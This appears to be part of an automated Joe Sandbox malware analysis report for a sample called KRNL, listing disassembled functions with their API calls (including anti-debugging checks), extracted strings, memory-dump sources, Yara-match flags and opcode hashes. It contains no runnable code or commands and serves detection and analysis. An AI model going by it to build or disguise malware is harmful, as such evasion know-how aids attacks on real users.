                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                                                          • Opcode ID: 0811dc5d54dcd6e208ad59da4009390de252316427d15be2baeda51ae405b2b5
                                                                                                                                                                                                                                                          • Instruction ID: b91da745e26a03ec8ed0bd7e8efe833aed5bc088ae6e1f902eb460f75323c139
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0811dc5d54dcd6e208ad59da4009390de252316427d15be2baeda51ae405b2b5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1771047290515DEFDF21AF28DC8DAFAB7F9AB05300F1442D9E14893292DB395E868F14
                                                                                                                                                                                                                                                          Function 006EF8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006EF8F5
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 006EF9C1
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006EF9DA
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 006EF9E4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
                                                                                                                                                                                                                                                          • Instruction ID: 5632d1c138e7a82584e457cfc60b87353c65b2defacd1043c6c2c13a66e8f8c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C331F6B5D013199BDF61DFA5D9497CDBBB8AF08300F1081AAE44CAB290EB759A848F45
                                                                                                                                                                                                                                                          Function 00418170 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 419COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004184AC
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: S-#9
                                                                                                                                                                                                                                                          • API String ID: 237503144-700798346
                                                                                                                                                                                                                                                          • Opcode ID: e2bc158481f8dfbd2a657db23a5401f3c476d650ecf493c40db5d62b40362113
                                                                                                                                                                                                                                                          • Instruction ID: 52d3a1a22797bc6ff2ef723818d6b4c880c4da0e2c4bb0917b947ec637b9ef44
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2bc158481f8dfbd2a657db23a5401f3c476d650ecf493c40db5d62b40362113
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4E1E876A046128BC724CF28C8517ABB7E2EFD4324F19892DE8C997394EF38D941C745
                                                                                                                                                                                                                                                          Function 00409570 Relevance: 5.4, Strings: 4, Instructions: 366COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 3BD251238DC531F1BCFD68B774EF9B7A$bC$mX$pid
                                                                                                                                                                                                                                                          • API String ID: 0-3426212376
                                                                                                                                                                                                                                                          • Opcode ID: 38a496d1901cb9fc1a1a81ae934acbfbe9411e11b166e4a8648ed1bfe5718dba
                                                                                                                                                                                                                                                          • Instruction ID: 78aa410c3e571a3c71217f04774d552cfb36f3c011885ca35bd8ebc00676843d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38a496d1901cb9fc1a1a81ae934acbfbe9411e11b166e4a8648ed1bfe5718dba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44C125B15183118BD328CF24C8516AFBBE5FF84304F15492DE5AAEB3A1E738D904CB86
                                                                                                                                                                                                                                                          Function 00429630 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 517$02"4
                                                                                                                                                                                                                                                          • API String ID: 0-4117730321
                                                                                                                                                                                                                                                          • Opcode ID: 9280ced3489e90234081316888d5cbab1c25a6192fcd2380d66ea8f60e248077
                                                                                                                                                                                                                                                          • Instruction ID: 788614aa283ce937e0284b5c45e1a05101e09933b0675d27cc46c1417dc3c243
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9280ced3489e90234081316888d5cbab1c25a6192fcd2380d66ea8f60e248077
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D13475A0C360DFD3049F28E89166BB7E1AF8A314F858A2DF4C5973A1D7399C40CB4A
                                                                                                                                                                                                                                                          Function 0043DB39 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                                                                          • API String ID: 0-149943524
                                                                                                                                                                                                                                                          • Opcode ID: 5b2196727f174ea9b258481d9f67c76f8990f14b878419990b001dbcc1b4b103
                                                                                                                                                                                                                                                          • Instruction ID: 482e6149b56366e601b592d2c8ef6da79fc9784322df0be9e518e1d530d1ba80
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b2196727f174ea9b258481d9f67c76f8990f14b878419990b001dbcc1b4b103
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C51E3B1A183208BD714CF28D96032BB6E2EFD9745F04A52DE4C597394E7399C08C78A
                                                                                                                                                                                                                                                          Function 0043E710 Relevance: 1.9, Strings: 1, Instructions: 647COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 41898e06d329f9b7dcce93df1159e086aaf4499670247650b597e40a1912500f
                                                                                                                                                                                                                                                          • Instruction ID: 56effb05c55d5e723ed47e9df777c39648b717dc24fdb7399af3515154e224fe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41898e06d329f9b7dcce93df1159e086aaf4499670247650b597e40a1912500f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F121239A18215CFC704CF28E88026BB3F2FF8A315F0A987DD945873A1EB359955DB85
                                                                                                                                                                                                                                                          Function 0043E820 Relevance: 1.8, Strings: 1, Instructions: 567COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 97ee515db7b271821da0c5f6ee7e03195be19e2c0d651d664716e8c5a31a3625
                                                                                                                                                                                                                                                          • Instruction ID: 24bd7fce4cce9c11c14dc7089d7bdd62ad2ae41bb7aab5742507e38462b34f06
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97ee515db7b271821da0c5f6ee7e03195be19e2c0d651d664716e8c5a31a3625
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE021135A18211CFC714CF28E8806ABB3F2FF8A315F0A987DD945973A1EB359851DB85
                                                                                                                                                                                                                                                          Function 00416777 Relevance: 1.8, Strings: 1, Instructions: 533COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: mA
                                                                                                                                                                                                                                                          • API String ID: 2994545307-377813790
                                                                                                                                                                                                                                                          • Opcode ID: f9881b5a2c76e10fa2e14fc1381623fcfa37601e07420e4b32e876335f5bb1c0
                                                                                                                                                                                                                                                          • Instruction ID: 39428711870aab526ad74d1bb6706073ceab97bda494de927c3493c7e305c467
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9881b5a2c76e10fa2e14fc1381623fcfa37601e07420e4b32e876335f5bb1c0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE199769187108BD728CF28C8503BBB7E2EFD5310F1A493DD8C6973A1DA399885CB95
                                                                                                                                                                                                                                                          Function 0043E920 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: fb77efca3cbf5cf22c915da0be89c3815572e68ec3722750ab8f79a114db9d3f
                                                                                                                                                                                                                                                          • Instruction ID: ce5334b28f323dc069e6442ef19ad98089a48ff52a3e4ef105bcb35b847b58c7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb77efca3cbf5cf22c915da0be89c3815572e68ec3722750ab8f79a114db9d3f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF10035A18211CFC718CF28D8906ABB3F2FB8A311F0A947DD945973A1EB35AC50DB85
                                                                                                                                                                                                                                                          Function 0043EA60 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: a75888721bd5923d498735bce53f8da3f0b87054ba0c149046fbca936bc988e0
                                                                                                                                                                                                                                                          • Instruction ID: 17999f29168490a76054be163b7d9b156083f59d85bc034f3f9228317ffeb93c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a75888721bd5923d498735bce53f8da3f0b87054ba0c149046fbca936bc988e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E11436A08215CFD718CF29D85026BB3E2EF8A300F0A987DD986973A1EB359941DB45
                                                                                                                                                                                                                                                          Function 0043E9D0 Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: cba630364bba8203fdcf11e63c032526e89e4d0b176a92fde8c55d32542c480f
                                                                                                                                                                                                                                                          • Instruction ID: 9f29137a07e53c7061bb74c7e8dbeff543532e97d29f2676d67eacb0b8170105
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cba630364bba8203fdcf11e63c032526e89e4d0b176a92fde8c55d32542c480f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50E1F135A18215CFCB14CF28D8806ABB3F2FB8A311F0A987DD945973A1EB359D41DB85
                                                                                                                                                                                                                                                          Function 00408E50 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: XqR
                                                                                                                                                                                                                                                          • API String ID: 0-4205905425
                                                                                                                                                                                                                                                          • Opcode ID: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
                                                                                                                                                                                                                                                          • Instruction ID: 4862d3e840e305e59ef710783f63dda1766adffe072164391312256b8460724a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71F33054D3858AD310DF79D0A036BFBF1AFA6340F08456DE8C5AB386D77A8909C79A
                                                                                                                                                                                                                                                          Function 00421E60 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ''
                                                                                                                                                                                                                                                          • API String ID: 0-2284169615
                                                                                                                                                                                                                                                          • Opcode ID: df89156451dc4e30c0006a9843085f9e270a73dd83cd9c4906fd0cc441646c2f
                                                                                                                                                                                                                                                          • Instruction ID: e6068bda0526af99a2bdf8ffdafc3c168081ed94b6e207db80534ad17edd005a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df89156451dc4e30c0006a9843085f9e270a73dd83cd9c4906fd0cc441646c2f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E57111B0704310ABD7109F24DC82B7773B4EF90318F54491DFA968B2A0E7B9D904C76A
                                                                                                                                                                                                                                                          Function 004195FD Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: Q R
                                                                                                                                                                                                                                                          • API String ID: 0-3646680613
                                                                                                                                                                                                                                                          • Opcode ID: 32d966ae9fdab9915fb8afc0a06445e1c5604de388feaf4180a495f8dbdd9674
                                                                                                                                                                                                                                                          • Instruction ID: 7bf4d4fac1c2ed1ff738cb4123fc0873976e416dc6a74a417e5fd2f71957197f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32d966ae9fdab9915fb8afc0a06445e1c5604de388feaf4180a495f8dbdd9674
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F41AF70504210DAC7289F24C8A56B7B3B6FFA2354F05461DE8DA5B3A1EB394D81C796
                                                                                                                                                                                                                                                          Function 0042B48C Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: EVJ_
                                                                                                                                                                                                                                                          • API String ID: 0-352177915
                                                                                                                                                                                                                                                          • Opcode ID: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
                                                                                                                                                                                                                                                          • Instruction ID: 53c7e9f4a335b1037adbc3e9afbb4642460edb32f2ec1fe4851bf9c39eef3fa3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B5135316093914AD725CF29D4503ABFBE2EFE7304F28C4ADC0C99B291DB3844068796
                                                                                                                                                                                                                                                          Function 0042B841 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: Nv
                                                                                                                                                                                                                                                          • API String ID: 0-2521146493
                                                                                                                                                                                                                                                          • Opcode ID: 2b352689b6d2e18ffca85da9fb8aa7ecc475735d32d62c09c8db4a7d2352111c
                                                                                                                                                                                                                                                          • Instruction ID: 3f7c8bd47a3eef01d4260e4ffcd1b4165a6c5dfd35694485603fb84523fdf014
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b352689b6d2e18ffca85da9fb8aa7ecc475735d32d62c09c8db4a7d2352111c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D51F4756082918BD329CB25D8507FBB7E1EFD6304F58986EC4CAD7250DB3848458B96
                                                                                                                                                                                                                                                          Function 0043FF00 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 30bc9f3443d8bff787af8f28f6ec9a1784be8cf9562241054020a525d8a93fcf
                                                                                                                                                                                                                                                          • Instruction ID: ff7e50e45248f1a8974a5061f60a754f092605ea59ae7395ab4f9fb307478800
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30bc9f3443d8bff787af8f28f6ec9a1784be8cf9562241054020a525d8a93fcf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC416672A053009BD7148F24CC15B6BB7E2FFC5328F19952DE9851B3A0E7799815C78A
                                                                                                                                                                                                                                                          Function 0042904E Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: Dkpk
                                                                                                                                                                                                                                                          • API String ID: 0-2230318481
